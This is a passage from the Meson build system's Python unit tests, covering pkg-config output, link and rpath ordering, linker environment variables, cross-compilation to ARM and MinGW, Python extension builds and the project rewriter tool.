pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
Build and install a static library, then check that an app project can be
built against it using only the generated pkg-config file.
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On these platforms, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
self.assertLess(deps.index(b'-lsomething'), deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpaths are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
as LD_LIBRARY_PATH, so the checks that run the installed program are only
done on macOS.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
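# Record the highest number of times the flag occurs on any single line;
# correct deduplication leaves exactly one occurrence.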
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that the library appears exactly once on this line: splitting
# on it must yield exactly two parts.
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
nativefile = tempfile.NamedTemporaryFile(mode='w')
nativefile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'build_wrapper.py')))
nativefile.flush()
self.meson_native_file = nativefile.name
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir)
def test_identity_cross_env(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
env = {
'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"',
}
crossfile = tempfile.NamedTemporaryFile(mode='w')
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
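# evarMap gives the environment variable used to select the linker for this
# language (e.g. CC_LD for C).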
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('bfd') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skip_if_not_language('rust')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
@skip_if_not_language('objc')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
@skip_if_not_language('objcpp')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skip_if_not_language('fortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
@skip_if_not_language('d')
def test_ld_environment_variable_d(self):
# At least for me, ldc defaults to gold, and gdc defaults to bfd, so
# let's pick lld, which isn't the default for either (currently)
self._check_ld('ld.lld', 'lld', 'd', 'ld.lld')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = http://server.invalid/foo
source_fallback_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = http://server.invalid/foo
patch_fallback_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.fail('Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
